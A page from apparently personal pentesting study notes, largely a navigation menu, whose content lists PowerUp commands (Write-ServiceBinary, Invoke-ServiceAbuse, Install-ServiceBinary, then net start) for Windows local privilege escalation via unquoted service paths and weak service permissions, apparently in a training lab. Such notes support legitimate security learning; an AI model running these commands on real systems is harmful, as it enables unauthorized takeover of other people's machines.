Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Unquoted Service Path
  • Service Permission
  • Service executable and argument permission
  1. Active Directory Pentesting

Local Privilege Escalation

PreviousPowerShell ADModuleNextPowerView Commands

Last updated 10 months ago

Used

In case if service cannot be started try stopping then restarting the service.

Unquoted Service Path

If unquoted service path is C:\WebServer\Abyss Web Server\abyssws.exe

Write-ServiceBinary -Name 'AbyssWebServer' -Path 'C:\WebServer\Abyssws.exe' -Username 'dcorp\student145'
net start AbyssWebServer or enter logoff

Service Permission

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student145' 
net start AbyssWebServer or enter logoff

Service executable and argument permission

Install-ServiceBinary -Name 'AbyssWebServer' -UserName 'dcorp\student145'

OR

Write-ServiceBinary -Name 'AbyssWebServer' -Path 'C:\WebServer\Abyss Web Server\abyssws.exe' -Username 'dcorp\student145'
net start AbyssWebServer or enter logoff
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1